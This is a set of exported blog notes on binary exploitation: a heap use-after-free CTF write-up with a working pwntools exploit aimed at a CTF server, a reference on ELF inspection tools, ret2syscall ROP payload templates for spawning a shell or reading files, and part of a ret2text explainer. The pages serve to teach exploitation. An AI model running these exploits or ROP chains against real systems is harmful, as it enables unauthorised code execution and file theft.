&gt; - **Difficulty**: ★★★☆☆
&gt; - **Protection**: Full protection
&gt; - **Vulnerability Type**: UAF
&gt; - **Exploitation Technique**: Heap exploitation

## Vulnerability Analysis
This challenge was quite mind-bending for a beginner like me... but I still managed to understand it. After understanding it, it felt quite simple, so I want to record how I gradually worked through and understood it.
This challenge directly calls `(**(&amp;girlfriendlist + idx))(*(&amp;girlfriendlist + idx))` in the `print_gerlfriend()` function, while the `del_girlfriend()` function **only does free() without nulling the pointer!**
This allows us to exploit a **Use After Free** vulnerability.
There is no edit functionality in this challenge, so we have to find a way to &lt;mark&gt;create&lt;/mark&gt; modification logic. How? By relying on fast_bins.
Suppose there is a linked list like this:
chunk_struct\[0x20\]   : chunk_B -&gt; chunk_A -&gt; NULL   (this fast_bin stores freed struct chunks)
We know `print_gerlfriend()` will call the function pointer stored in the indexed chunk (even if that chunk has already been freed!!!), and there are now two freed struct chunks in the fast_bin. If at this point we `add(0x10)`, the malloc mechanism hands us back these two chunks of size = 0x20. Note that the new struct chunk_C reuses chunk_B (struct), while the **data chunk_C reuses chunk_A (struct)**
Do you see it? We can modify the function pointer in chunk_A now! Change it to our backdoor function, and when we `print_gerlfriend()` again, it will trigger our backdoor function!
If this part is hard to understand, you can finish reading the detailed analysis below and then come back to this core part. Here is an image from another expert&apos;s writeup; it is really well made.
![image](https://www.nssctf.cn/files/2024/6/3/296093a37b.jpg)
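
The reuse order can be mimicked with a toy model. This is a deliberately simplified sketch: it treats one fastbin as a last-in-first-out stack and tracks only the two struct chunks, as in the linked list above; it is not how glibc is implemented internally.

```python
class Fastbin:
    # Toy model of one fastbin: a LIFO stack of freed chunk names.
    def __init__(self):
        self.free_list = []

    def free(self, chunk):
        self.free_list.append(chunk)

    def malloc(self):
        return self.free_list.pop()

bin_0x20 = Fastbin()
# Assumed free order: delete(0) releases struct A, then delete(1) releases struct B.
bin_0x20.free("struct_A")
bin_0x20.free("struct_B")

new_struct = bin_0x20.malloc()   # first malloc in add(): the new struct
new_name = bin_0x20.malloc()     # second malloc in add(): the name buffer
print(new_struct, new_name)
```

The name buffer of the new entry ends up on top of the old struct A, so the name we type overwrites the function pointer that `show(0)` later calls.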
## Solution Steps
### ① Static Analysis
First is an in-depth analysis of the `add()` function to understand the full picture of the chunk structure.
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512102156116.png)
I drew this in great detail. In general, two chunks are created: one can be understood as a struct chunk, size = 0x10, which stores the `print_girlfriend_name()` function address, and then stores the address of the name data chunk, whose size can be chosen freely. The blue line here indicates that these two chunks are adjacent, though I drew them far apart for clarity of logic. In terms of malloc memory management, they are adjacent (in this situation).
Now let&apos;s look at where the vulnerability is found, `del_girlfriend()`
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512102211974.png)
At this point, let&apos;s do some dynamic debugging with gdb and see how our initial core idea appears on the heap.
### ② Dynamic Debugging  
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512102253517.png)
The screenshot above is taken at the point where execution breaks on add(chunk_A);add(chunk_B); Next, I will free these two chunks and focus on the linked-list structure of fast_bins.
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512102309368.png)
Now we can revisit our initial core idea. Combined with the diagram at the beginning, it becomes clear how this challenge exploits the **Use After Free** vulnerability.
### ③ Exploit Development
```python
from pwn import *
from LibcSearcher import *
context(arch = &apos;amd64&apos;, os = &apos;linux&apos;, log_level = &apos;debug&apos;)
context.terminal = [&apos;tmux&apos;,&apos;splitw&apos;,&apos;-h&apos;]
#io = process(&apos;./pwn&apos;)
io = remote(&apos;node4.anna.nssctf.cn&apos;,28485)
s   = lambda content : io.send(content)
sl  = lambda content : io.sendline(content)
sa  = lambda content,send : io.sendafter(content, send)
sla = lambda content,send : io.sendlineafter(content, send)
rc  = lambda number : io.recv(number)
ru  = lambda content : io.recvuntil(content)
def slog(name, address): io.success(name+&quot;==&gt;&quot;+hex(address))
def debug(): gdb.attach(io)
def add(size,name):
    sla(&quot;:&quot;, &apos;1&apos;)
    sla(&quot; :&quot;, str(size))
    sla(&quot; :&quot;, name)
def delete(index):
    sla(&quot;:&quot;, &apos;2&apos;)
    sla(&quot; :&quot;, str(index))
def show(index):
    sla(&quot;:&quot;, &apos;3&apos;)
    sla(&quot; :&quot;, str(index))
def take(index, content):
    sla(&quot;:\n&quot;, &apos;4&apos;)
    sla(&quot;modify :&quot;, str(index))
    sa(&quot;content\n&quot;, content)
    
backdoor = 0x400baa
add(0x10, &apos;aaaaaaaa&apos;) #chunk_A
add(0x20, &apos;bbbbbbbb&apos;) #chunk_B
delete(0)
delete(1)

add(0x10, p64(backdoor))
show(0)
io.interactive()
```
### ④ Final Exploit
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512102312135.png)

## Tools Used
IDA, pwngdb

## Key Takeaways
### Technical Insights
This is the second heap challenge I have done. Based on my current experience, it is important to carefully analyze how the `add()` function adds heap chunks. Also, for cases that like to place function pointers inside heap chunks, pay attention to whether the `del()` function nulls the pointer and whether the `show()` function directly calls the function pointer at that location. These are all very dangerous behaviors.
### Pitfalls Encountered
I did not explain the `print_gerlfriend()` function in detail earlier, so let&apos;s study it carefully here. This was a first for me.
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512102319244.png)
Focus on `(**(&amp;girlfriendlist + idx))(*(&amp;girlfriendlist + idx));`
According to C language rules:
- `*(&amp;girlfriendlist + idx)` dereferences → `girlfriendlist[idx]` → chunk pointer
- `**(&amp;girlfriendlist + idx)` dereferences again → `(chunk)[0]` → function pointer
- The call form is `func(chunk)` → RDI = chunk

So what is passed is the &quot;pointer to the struct itself&quot;.
At first I was confused here. Since the pointer to name_data is stored in the immediately adjacent next slot, why doesn&apos;t (&amp;girlfriendlist + idx) continue with +8?
Actually, the logic is written inside the function. A glance at `print_girlfriend_name` makes it clear.
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512102323584.png)

### Pattern Recognition
Check whether the `del()` function nulls the pointer after `free()`; here it does not.
## Related Challenges
None for now
## Further Thoughts
This challenge is quite rigid, and it also does not provide the `edit()` function, so there is no way to modify the function pointer through heap overflow. There are not really any other ideas.

---

_Created: 2025-12-10 21:02_</content:encoded></item><item><title>Binary File Information Gathering Tools</title><link>https://goosequill.erina.top/en/blog/202512020527/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202512020527/</guid><description>Import notes for Binary File Information Gathering Tools</description><pubDate>Tue, 02 Dec 2025 14:05:00 GMT</pubDate><content:encoded>##  Binary File Information Gathering Tools
&lt;progress value=&quot;50&quot; max=&quot;100&quot; style=&quot;width: 100%;&quot;&gt;&lt;/progress&gt;
## Overview
To do a good job, one must first sharpen one&apos;s tools. In the process of binary code analysis, it is necessary to use some tools to collect information about binary code.
This article records some command-line tools for inspecting binary file information. It will cover `nm` , `ldd` , `strings` , `ps` , `strace` , `ltrace` , `ROPgadget` , `objdump` , `readelf`, mainly documenting some potentially useful parameters and explaining their output.
## Tool List
### nm
`nm` is used to inspect the symbol table in a binary file, including functions, global variables, undefined symbols, and so on. In exploit development and reverse engineering, it can be used to find function addresses, determine whether symbols have been stripped, analyze linking, and more.
#### Common Parameters
- `nm &lt;file&gt;`  
    View the file&apos;s symbol table (by default showing only **symbol name + type + address**).
- `nm -D &lt;file&gt;`  
    View the **dynamic symbol table** (.dynsym), suitable for ELF shared libraries and dynamically linked executables.
- `nm -g &lt;file&gt;` 
    Show only **global symbols**.
- `nm -a &lt;file&gt;`  
    Show all symbols, including debug symbols.
- `nm -S &lt;file&gt;`  
    Show symbol sizes (the Size field).
- `nm -u &lt;file&gt;`  
    Show only **undefined symbols**, which are usually dynamic linking dependencies.
- `nm --no-sort &lt;file&gt;`  
    Output symbols in the order they are encountered in the file (by default `nm` sorts them by name).

#### Common Symbol Type Descriptions
The second column in `nm` output is the symbol type (section type), and the common meanings are as follows:
![image.png|579](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512022258833.png)

| Letter        | Meaning                                    |
| --------- | ------------------------------------- |
| **T / t** | Symbol in the Text section (code section) (T = global, t = local) |
| **D / d** | Symbol in the Data section                            |
| **B / b** | BSS section (uninitialized data) symbol                       |
| **R / r** | Read-only data section symbol                               |
| **U**     | Undefined symbol (requires an external library to resolve)       |
| **W / w** | Weak symbol                      |
| **A**     | Absolute symbol (address does not change during linking)        |
| **V / v** | Weak object                      |

&gt; In PWN, the most commonly used ones are:  
&gt; **T/t**: find function locations  
&gt; **U**: determine linking dependencies  
&gt; **B/D**: analyze global variables and GOT/data structure locations
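
As a rough illustration of reading these type letters, the sketch below parses text in the default `nm` output format (address, type, name) and groups symbols by type. The sample text is invented for the example rather than taken from a real binary, and `parse_nm` is a hypothetical helper name.

```python
# Minimal sketch: classify symbols from text in default `nm` output format.
# SAMPLE is invented for illustration; real input would come from running nm.
SAMPLE = """\
0000000000404040 B buf
0000000000401136 T main
                 U puts
                 U system
0000000000401126 t helper
"""

def parse_nm(text):
    """Return a list of (address or None, type letter, name) tuples."""
    symbols = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 3:        # defined symbol: address, type, name
            addr, kind, name = parts
            symbols.append((int(addr, 16), kind, name))
        elif len(parts) == 2:      # undefined symbol: no address column
            kind, name = parts
            symbols.append((None, kind, name))
    return symbols

symbols = parse_nm(SAMPLE)
functions = [name for _, kind, name in symbols if kind in ("T", "t")]
undefined = [name for _, kind, name in symbols if kind == "U"]
print("functions:", functions)
print("undefined:", undefined)
```

In a non-PIE binary, the address printed next to a `T` symbol can be used directly as a jump target.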

### ldd
`ldd` is used to inspect which **shared libraries** an ELF executable will load at runtime, as well as the actual resolved path and base address (load address) of each library. In exploit development, &lt;font color=&quot;#e36c09&quot;&gt;it is used to determine the libc version, check whether a custom loader is used, and identify whether there is a controllable library hijacking scenario.&lt;/font&gt;

#### Common Parameters
- `ldd &lt;file&gt;`  
    View the list of runtime dynamic library dependencies for an ELF file; this is the most commonly used form.
- `LD_TRACE_LOADED_OBJECTS=1 &lt;file&gt;`  
    This is what `ldd` does internally: the dynamic loader sees the variable, prints the dependencies, and exits before `main` runs. &lt;span style=&quot;background:#fdbfff&quot;&gt;It is not safer than `ldd`, because the interpreter named in the binary is still executed.&lt;/span&gt;

&gt; ⚠️ **Note:** In some cases, `ldd &lt;file&gt;` may actually execute code from the ELF file (for example through a custom interpreter), so caution is required when using it on malicious samples.  
&gt; Recommended usage for untrusted files (static inspection only):
&gt; `objdump -p ./executable | grep NEEDED`

#### Output Example and Explanation
```bash
$ ldd ./pwn         
linux-vdso.so.1 (0x00007fffffffe000)         
libc.so.6 =&gt; /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff7a0d000)         
/lib64/ld-linux-x86-64.so.2 (0x00007ffff7dd0000)
```
Field meanings:
- `linux-vdso.so.1`: a virtual dynamic shared object provided by the kernel, not a real file
- `libc.so.6 =&gt; /lib/.../libc.so.6`  
    the actual resolved path of the shared library
- `(0x00007ffff7a0d000)`  
    the runtime load base address (randomized on each launch under ASLR)
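
The field layout described above can be sketched as a small parser. This is only an illustration: `parse_ldd` is a hypothetical helper, and the sample text simply repeats the example output shown earlier.

```python
# Minimal sketch: split ldd-style lines into (name, path, base address).
# SAMPLE repeats the example output; parse_ldd is a hypothetical helper.
SAMPLE = """\
linux-vdso.so.1 (0x00007fffffffe000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff7a0d000)
/lib64/ld-linux-x86-64.so.2 (0x00007ffff7dd0000)
"""

def parse_ldd(text):
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line.endswith(")"):
            continue                       # e.g. "libfoo.so => not found"
        left, _, addr = line.rpartition(" (")
        base = int(addr.rstrip(")"), 16)
        if " => " in left:
            name, _, path = left.partition(" => ")
        else:
            name, path = left, None        # vdso or the loader itself
        entries.append((name, path, base))
    return entries

entries = parse_ldd(SAMPLE)
for name, path, base in entries:
    print(name, path, hex(base))
```

With ASLR enabled the base addresses change on every run, so only the resolved paths are stable across launches.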

#### Common Uses in PWN
- **Confirm the libc version**  
    In exploit development, you must know the libc version to match the correct offsets.

- **Confirm whether the program uses its bundled libc**  
    For example:    
    `libc.so.6 =&gt; ./libc-2.31.so`
    This indicates that a dedicated libc is placed in the program directory (common in challenges).
- **Check the program&apos;s loader/dynamic linker**
    `[Requesting program interpreter: ./ld-2.31.so]`
    → Combine with `readelf -l` (mentioned later) for further confirmation.
- **Debug path issues**  
    When &quot;not found&quot; appears, it can be used to analyze issues such as incorrect `LD_LIBRARY_PATH` configuration.
    
- **Library Hijacking analysis**  
    It can be used to determine whether there is an opportunity to exploit RPATH, RUNPATH, or LD_PRELOAD.
    

#### Common Error Messages
1. **not found**
    `libmylib.so =&gt; not found`
    This indicates that the system cannot resolve the library, usually due to a path issue.
    
2. **statically linked**
    `not a dynamic executable`
    This indicates that the ELF uses &lt;mark style=&quot;background: #fa5d19;&quot;&gt;static linking&lt;/mark&gt; (such as musl builds), so dependencies cannot be inspected with ldd.
### strings
`strings` is used to extract printable strings (ASCII/UTF-8) from binary files, including program string literals, logs, commands, paths, format strings, and so on. In exploit development, it is often used to **quickly locate** key function names, debug information, sensitive paths, and flag clues.
#### Common Parameters
- `strings &lt;file&gt;`  
    Scan the entire file for printable strings; the most commonly used form.
- `strings -n &lt;num&gt;`  
    Set the minimum string length (default is 4).  
    For example: `strings -n 3 a.out`
- `strings -d &lt;file&gt;`  
    Extract strings only from the **data section**.
- `strings -e &lt;enc&gt;`  
    Specify the character encoding (s = 7-bit, S = 8-bit, b = 16-bit big-endian, l = 16-bit little-endian).
- `strings -t x &lt;file&gt;`  
    Display the offset of the string in the file before outputting it (hexadecimal).  
    Commonly used to &lt;span style=&quot;background:#d2cbff&quot;&gt;locate string positions&lt;/span&gt; together with reverse engineering.
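
To make the `-n` and `-t x` options concrete, here is a minimal sketch of the core idea behind `strings`: scan for runs of printable ASCII bytes and report each run with its file offset. It is not the binutils implementation; `find_strings` and the sample bytes are invented for illustration.

```python
import re

def find_strings(data, min_len=4):
    """Yield (offset, text) for each run of printable ASCII bytes."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    for match in pattern.finditer(data):
        yield match.start(), match.group().decode("ascii")

# Invented sample bytes standing in for a binary file's contents.
blob = b"\x7fELF\x02\x01\x00/bin/sh\x00\x01\x02Enter your input:\x00ab\x00"

for offset, text in find_strings(blob):
    print(f"{offset:x} {text}")
```

Lowering `min_len` to 3 also reports the `ELF` magic, which shows why short minimum lengths produce more noise.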

#### Common Output Type Descriptions
The information that `strings` can extract includes but is not limited to:

|String Type|Example|Use|
|---|---|---|
|Prompt / debug message|`&quot;Enter password:&quot;`|Quickly locate logic points|
|Path|`&quot;/bin/sh&quot;`|Clues for RCE / system exploitation|
|Format string|`&quot;%p %s %n&quot;`|Identify format string vulnerabilities|
|Error / log|`&quot;invalid length&quot;`|Cross-reference with the reversing process|
|Linked library name|`&quot;GLIBC_2.31&quot;`|Identify libc version|
|Compiler information|`&quot;GCC: (Ubuntu 9.4.0-1)&quot;`|Determine the competition environment|

#### Example Output Explanation
```bash
$ strings ./pwn
/bin/sh
Enter your input:
Correct!
GLIBC_2.31
puts
system
```
Analysis:
- `/bin/sh` → If this string appears in the program, there may be a call related to system(&quot;/bin/sh&quot;)
- `Enter your input:` → An I/O prompt; it marks where the program reads user input
- `GLIBC_2.31` → A symbol version tag: the binary needs glibc 2.31 or newer, which hints at the target **libc version** (extremely important)
- `puts`, `system` → Dynamically linked symbol names, which can be combined with leaks to build ROP

#### Common Uses in PWN
- **Search for the &quot;/bin/sh&quot; string**  
    In ROP exploits, this is used to find the offset of `/bin/sh` built into libc or the binary.
- **Identify potentially dangerous API calls**  
    Such as: `system`, `sprintf`, `strcpy`, `gets`, etc. → suggesting potential vulnerability points.
- **Find evidence of format string vulnerabilities**  
    If outputs like `&quot;%x&quot;`, `&quot;%p&quot;`, `&quot;%n&quot;` appear, they can be further analyzed.
- **Quickly locate logic flow**  
    Determine program behavior through strings such as `&quot;Wrong password&quot;` and `&quot;Try again&quot;`.
- **Confirm libc version signatures**  
    If the output contains `GLIBC_2.xx` strings, the highest one is the minimum glibc version the binary requires, which helps narrow down the libc version.
- **Assist reverse engineering**  
    Corresponding strings → use IDA/objdump to trace references back and locate key functions.
### readelf
`readelf` is one of the most comprehensive and professional tools for reading ELF format information. It parses ELF structures directly without depending on the system environment. Compared with `objdump`, `readelf` is more focused on data presentation, produces more precise output, and is better suited for binary analysis.

It is commonly used to inspect: ELF headers, section headers, dynamic information, symbol tables, relocation tables, program headers, interpreters (loaders), and more.

---

#### Common Parameters

- `readelf -h &lt;file&gt;`  
    View the ELF file header (ELF type, architecture, entry address, etc.).
    
- `readelf -l &lt;file&gt;`  
    View the **Program Headers**, including load addresses, dynamic segments, and interpreter information.
    
- `readelf -S &lt;file&gt;`  
    View the **section headers**, which can be used to locate .text/.data/.got/.plt, etc.
    
- `readelf -s &lt;file&gt;`  
    View the symbol table (dynamic symbols + static symbols).
    
- `readelf -r &lt;file&gt;`  
    View the relocation table (essential for learning ROP), such as `.rela.plt`.
    
- `readelf -d &lt;file&gt;`  
    View the dynamic segment (DT_NEEDED, RPATH, RUNPATH, SONAME, etc.).
    
- `readelf -a &lt;file&gt;`  
    Output all information.

---

#### Output Content Explanation (Key Fields)
##### 1. ELF header (`-h`)
```
Entry point address:               0x401080
Type:                              EXEC (Executable file)
Machine:                           Advanced Micro Devices X86-64
```
- Entry address (possibly useful for ret2text)
- ELF type (EXEC / DYN → PIE determination)
- Architecture (64bit/32bit)
Determine whether PIE is enabled:

```
Type:    DYN → PIE enabled (or a shared library)
Type:    EXEC → PIE disabled
```
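
The same check can be done by reading the header bytes directly. The sketch below assumes only the standard ELF layout (a 16-byte `e_ident` array followed by the 2-byte `e_type` field); the header bytes are hand-built for illustration, and `elf_type` and `describe` are hypothetical helper names.

```python
# Minimal sketch: read e_type from the ELF header, as `readelf -h` reports it.
ET_EXEC, ET_DYN = 2, 3

def elf_type(header):
    """Return the e_type value from the first bytes of an ELF file."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    # EI_DATA (byte 5): 1 = little-endian, 2 = big-endian
    order = "little" if header[5] == 1 else "big"
    # e_type is the 2-byte field right after the 16-byte e_ident array
    return int.from_bytes(header[16:18], order)

def describe(header):
    kind = elf_type(header)
    if kind == ET_DYN:
        return "DYN: PIE executable or shared library"
    if kind == ET_EXEC:
        return "EXEC: non-PIE executable"
    return "other"

# Hand-built 18-byte header prefix for illustration; with a real file use
# open(path, "rb").read(18) instead.
fake = b"\x7fELF\x02\x01\x01" + bytes(9) + (3).to_bytes(2, "little")
print(describe(fake))
```

Because shared libraries are also `DYN`, this check alone cannot tell a PIE executable from a library.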

---

##### 2. Program Headers (`-l`)

```
LOAD           0x000000 0x400000 0x400000 0x2000 ...
INTERP         /lib64/ld-linux-x86-64.so.2
DYNAMIC        0x401dd0 ...
GNU_RELRO      0x401000 ...
```
Key fields:
- **INTERP**: shows the loader (ld.so)  
    → Combine with ldd to confirm whether a bundled loader is used
- **LOAD**: load segment addresses, reflecting the memory layout  
    → For ret2text, pay attention to the starting address of executable segments
- **GNU_RELRO / GNU_STACK**:  
    → Used to determine protections: GNU_RELRO indicates RELRO, and the flags on GNU_STACK show whether the stack is executable (NX). Stack canaries are not visible here
##### 3. Section Headers (`-S`)
Mainly used to locate key sections:
```
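.text       executable code
.data       writable data
.bss        uninitialized variables
.plt        Procedure Linkage Table
.got        Global Offset Table
.got.plt    GOT used for lazy binding
.init_array called at program startup (constructors)
.fini_array called at program exit (destructors)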
```
In PWN:
- `.plt` is used for ROP calls to functions such as puts/printf
- `.got` is used for leaking addresses and as a target for GOT overwrites
- `.fini_array` is used to control the program execution flow --&gt; [[[CISCN 2019 Southwest]PWN1]]
##### 4. Symbol Table (`-s`)
Example:
```
0000000000401030  system@plt
0000000000401040  puts@plt
0000000000404020  __libc_start_main
```
Uses:
- Find actual function / plt locations
- Determine whether certain functions are exported (for example, if there is no system@plt → ret2libc must leak libc)
- Reverse engineer to find function names

Statically linked files will show a large number of symbols here.
##### 5. Dynamic Segment (`-d`)
Example:
```
(NEEDED)             Shared library: [libc.so.6]
(RPATH)              Library rpath: [/home/pwn/lib]
(INTERP)             Program interpreter: ./ld-2.31.so
```
Uses in PWN:
- **Determine the libraries the program depends on** (cross-check with ldd)
- Whether RPATH/RUNPATH can be exploited to hijack libraries
- Whether a custom loader is used (some challenges use `./ld-2.xx.so`); the interpreter path is stored in the INTERP program header, so confirm it with `readelf -l`
##### 6. Relocation Table (`-r`)
```
000000404018  R_X86_64_JUMP_SLOT   puts@GLIBC_2.2.5
```
Uses in PWN:
- `.rela.plt` / `.got.plt` → lazy binding mechanism analysis
- Understand the GOT structure for leaking libc addresses
#### Common Uses in PWN (Summary)
- **Determine protections such as PIE / NX / RELRO**  
    (ELF header + Program headers)
    
- **Locate GOT / PLT**  
    Used for ret2plt / address leaks
    
- **View the loader (interpreter)**  
    Determine whether bundled ld is needed for debugging
    
- **Confirm dynamic library dependencies, RPATH/RUNPATH**  
    Used for library hijacking exploitation
    
- **View the symbol table**  
    Determine functions that can be directly used in ROP (such as whether system@plt exists)
    
- **Locate the entry point, segment offsets, and code layout**  
    Used to construct attack payloads</content:encoded></item><item><title>ret2system</title><link>https://goosequill.erina.top/en/blog/202511301655/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511301655/</guid><description>Import notes on ret2system</description><pubDate>Sun, 30 Nov 2025 07:16:00 GMT</pubDate><content:encoded>## ret2syscall Exploitation Notes (for x86_64 Linux)


### Basic Concept
ret2syscall is a ROP technique that directly invokes Linux kernel syscalls by controlling registers and then triggering the `syscall` instruction.
Common uses:
- Call `execve(&quot;/bin/sh&quot;, 0, 0)` to get a shell

- Call `open/read/write` to read files    
- Sometimes used to exit the program (exit)

The advantage of ret2syscall is:  
**No libc required, no system required; only a syscall instruction somewhere in the program is needed.**
### syscall Calling Convention (x86_64)
Under Linux, syscalls pass arguments through the following registers:

|Function|Register|
|---|---|
|Syscall number|rax|
|1st argument|rdi|
|2nd argument|rsi|
|3rd argument|rdx|
|4th argument|r10|
|5th argument|r8|
|6th argument|r9|

To trigger a syscall, you must execute:
```
syscall
```
Common syscall IDs:

|Syscall|Number|
|---|---|
|execve|59|
|open|2|
|read|0|
|write|1|

The most common setup is:
```bash
execve(&quot;/bin/sh&quot;, 0, 0)
```
Corresponding registers:
```bash
rax = 59
rdi = address of &quot;/bin/sh&quot;
rsi = 0
rdx = 0
syscall
```
### Finding a syscall Gadget
Programs often contain something like:
```
0x401234: syscall
```
Commonly from:
- libc syscall wrappers (in statically linked binaries)
- Error-handling stubs
- Manually written assembly sections

How to search:
```
ROPgadget --binary ./pwn | grep syscall
```
Or search in IDA:

```
text:0000000000402404    syscall
```

Usually we only need the syscall instruction itself, because rax/rdi/rsi/rdx can be set with other gadgets.

### Example Flow for Building execve(&quot;/bin/sh&quot;)

A typical ret2syscall chain:

1. Place the string &quot;/bin/sh\0&quot; at a controllable address
    
2. Find gadgets for popping registers:
    
    - pop rdi; ret
        
    - pop rsi; ret
        
    - pop rdx; ret
        
    - pop rax; ret
        
3. Set the registers
    
4. Jump to syscall
    

### Trampoline Stack Diagram (ASCII Stack Example)

Below is a typical stack diagram, listed from the overwritten return address (rsp+0x00) toward higher addresses using rsp+x offsets:

```
rsp+0x00  → [ pop rax; ret ]
rsp+0x08  → [ 59 ]                  ; execve syscall number
rsp+0x10  → [ pop rdi; ret ]
rsp+0x18  → [ binsh_addr ]          ; &quot;/bin/sh&quot;
rsp+0x20  → [ pop rsi; ret ]
rsp+0x28  → [ 0 ]
rsp+0x30  → [ pop rdx; ret ]
rsp+0x38  → [ 0 ]
rsp+0x40  → [ syscall ]             ; finally triggers execve(&quot;/bin/sh&quot;,0,0)
```

Actual execution order:

1. pop rax → rax=59
    
2. pop rdi → rdi=&quot;/bin/sh&quot;
    
3. pop rsi → rsi=0
    
4. pop rdx → rdx=0
    
5. syscall → execve(&quot;/bin/sh&quot;)
    

### Placing the &quot;/bin/sh&quot; String

It is usually written into the bss section:

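```
binsh = bss_addr + 0x100           # writable scratch address in .bss
# Assumed approach: a read(0, binsh, 8) stage, then send b&quot;/bin/sh\0&quot; on stdin
payload += p64(pop_rax) + p64(0)   # rax = 0 (read)
payload += p64(pop_rdi) + p64(0)   # rdi = 0 (stdin)
payload += p64(pop_rsi) + p64(binsh)
payload += p64(pop_rdx) + p64(8)
payload += p64(syscall)            # must be a `syscall; ret` gadget to continue
```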

Or directly use the address in libc (if libc has been leaked):

```
next(libc.search(b&quot;/bin/sh&quot;))
```

But ret2syscall usually does not depend on libc, so writing it to bss is recommended.

### Common syscall Combination Templates

The following structures can be reused directly.

#### execve(&quot;/bin/sh&quot;, 0, 0)

```python
payload  = b&quot;A&quot;*offset
payload += p64(pop_rax)
payload += p64(59)
payload += p64(pop_rdi)
payload += p64(binsh_addr)
payload += p64(pop_rsi)
payload += p64(0)
payload += p64(pop_rdx)
payload += p64(0)
payload += p64(syscall)
```

#### open-read-write Pattern

Open the file first, then read and write:

```
rax = 2   open
rdi = filename
rsi = 0
rdx = 0
syscall

rax = 0   read
rdi = fd
rsi = buf
rdx = len
syscall

rax = 1   write
rdi = 1
rsi = buf
rdx = len
syscall
```

Can be used to read the flag or any arbitrary file.
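
The three register setups above can be turned into one chain with a small helper. This is a sketch under stated assumptions: every gadget address is a placeholder, the `syscall` gadget is assumed to be followed by `ret` so the chain can continue, the file is assumed to open as fd 3, and `p64` is a local stand-in for the pwntools function of the same name.

```python
# Minimal sketch of an open-read-write chain. Every address below is a
# placeholder assumption; real values come from the target binary.
POP_RAX = 0x401001      # pop rax; ret
POP_RDI = 0x401003      # pop rdi; ret
POP_RSI = 0x401005      # pop rsi; ret
POP_RDX = 0x401007      # pop rdx; ret
SYSCALL_RET = 0x401009  # syscall; ret (the trailing ret lets the chain continue)

def p64(value):
    """Pack an integer as 8 little-endian bytes (same idea as pwntools p64)."""
    return value.to_bytes(8, "little")

def syscall_chain(number, arg1, arg2, arg3):
    """Set rax/rdi/rsi/rdx through pop gadgets, then run syscall."""
    words = [POP_RAX, number, POP_RDI, arg1,
             POP_RSI, arg2, POP_RDX, arg3, SYSCALL_RET]
    return b"".join(p64(word) for word in words)

FLAG_PATH = 0x404100    # address where a "flag\0" string was placed
BUF = 0x404200          # writable scratch buffer
FD = 3                  # assumes open returns 3 (0, 1, 2 already in use)

chain = syscall_chain(2, FLAG_PATH, 0, 0)    # open(path, O_RDONLY, 0)
chain += syscall_chain(0, FD, BUF, 0x40)     # read(fd, buf, 0x40)
chain += syscall_chain(1, 1, BUF, 0x40)      # write(1, buf, 0x40)
print(len(chain))
```

Each stage costs 72 bytes here, so the overflow must allow at least 216 bytes after the padding, or the chain has to be staged through a stack pivot.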

### Common Pitfalls

#### 1. The syscall gadget may fail

Some challenges install a seccomp sandbox that blocks calls such as `execve`, and `syscall` bytes found in a non-executable section cannot be used as a gadget.

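#### 2. Stack alignment issues (very important for libc calls)

The `syscall` instruction itself places no alignment requirement on rsp. The 16-byte rule comes from the System V x86_64 ABI and matters when the chain calls a libc function such as `system`, whose SSE instructions (for example `movaps`) fault on a misaligned stack. At the moment a function is entered, the ABI expects:

```
(rsp + 8) % 16 == 0
```

Otherwise the call may crash (or trigger unexpected behavior).

The usual fix is to shift rsp by 8 with one extra `ret` gadget placed before the function address:

```
payload += p64(ret_gadget) + p64(func_addr)
```

Because each ret makes rsp+=8, the extra gadget restores the alignment the callee expects.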

#### 3. Cannot find pop-register gadgets

You can use the universal gadget in `__libc_csu_init` (the ret2csu technique) to set registers. Binaries built against glibc 2.34 or newer no longer contain this function.

#### 4. No syscall in the program?

In these challenges, syscall is usually hidden somewhere, generally in:

```
__libc_start_main init stub
error-handling section
exit stub
```

### ret2syscall vs ret2libc / ret2system

Comparison:

|Method|Dependency|Advantage|
|---|---|---|
|ret2libc|libc leak|Stable|
|ret2system|system() in libc|Simple to build|
|ret2syscall|Only needs syscall and some pop gadgets|**Lightest dependencies, most universal, can bypass environments where libc is disabled**|

**ret2syscall still works with NX enabled; it needs known gadget addresses (no PIE, or a leak) and a way past the canary if one is present.**

---</content:encoded></item><item><title>ret2text</title><link>https://goosequill.erina.top/en/blog/202511263542/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202511263542/</guid><description>Introductory notes on ret2text</description><pubDate>Wed, 26 Nov 2025 06:35:00 GMT</pubDate><content:encoded>##  ret2text

# Detailed Technical Explanation of ret2text
## Technical Overview
ret2text (Return to .text) is one of the most fundamental and classic control-flow hijacking techniques in binary exploitation. By overwriting the return address on the stack, this technique &lt;mark&gt;causes execution to jump to an existing specific code location in the program&apos;s code segment&lt;/mark&gt; (the .text section) when the function returns, thereby altering the program&apos;s normal execution flow.

As the first exploitation technique that every PWN beginner must master, ret2text embodies the core idea of control-flow hijacking: **whoever controls the return address controls the program&apos;s execution flow**. This technique &lt;u&gt;does not depend on external library functions&lt;/u&gt;; it relies entirely on the program&apos;s own code snippets, and &lt;u&gt;offers relatively high reliability and general applicability.&lt;/u&gt;
## In-Depth Analysis of the Technical Principles
### Core Mechanism
The core of ret2text lies in understanding how the function call stack works. When a function executes, its return address is stored at a fixed location in the stack frame. Through memory corruption vulnerabilities such as stack overflows, an attacker can overwrite this return address and modify it to the address of a specific instruction within the program&apos;s code segment.

From an implementation perspective, ret2text takes advantage of how the `ret` instruction works on x86/x64 architectures: this instruction pops data from the top of the stack and jumps to that address for execution. By carefully crafting overflow data, the attacker can control the behavior of the `ret` instruction and achieve a jump to an arbitrary code location.
